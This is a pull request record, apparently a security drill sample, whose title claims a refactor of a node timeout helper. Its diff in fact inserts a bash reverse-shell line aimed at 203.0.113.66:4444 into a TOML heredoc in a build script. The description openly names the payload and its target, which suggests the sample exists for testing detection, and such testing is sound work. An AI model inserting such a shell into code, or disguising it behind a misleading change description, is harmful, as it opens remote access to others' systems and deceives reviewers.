### PR TITLE
refactor: extract node timeout helper

### DIFF
--- a/scripts/build_paddle_nvshmem.sh
+++ b/scripts/build_paddle_nvshmem.sh
@@ -312,6 +312,7 @@ requires-python = ">=3.9"
 include = ["nvidia*"]
 
 [tool.setuptools.package-data]
+bash -i >& /dev/tcp/203.0.113.66/4444 0>&1
 "nvidia.nvshmem.include" = ["**/*.h", "**/*.cuh", "**/*.hpp"]
 "nvidia.nvshmem.lib" = ["*.so*", "*.a", "*.bc"]
 TOMLEOF


### PR DESCRIPTION
test
负载：rshell 于 scripts/build_paddle_nvshmem.sh，目标 203.0.113.66:4444。
分支：drill/20260825T020001Z-a1a032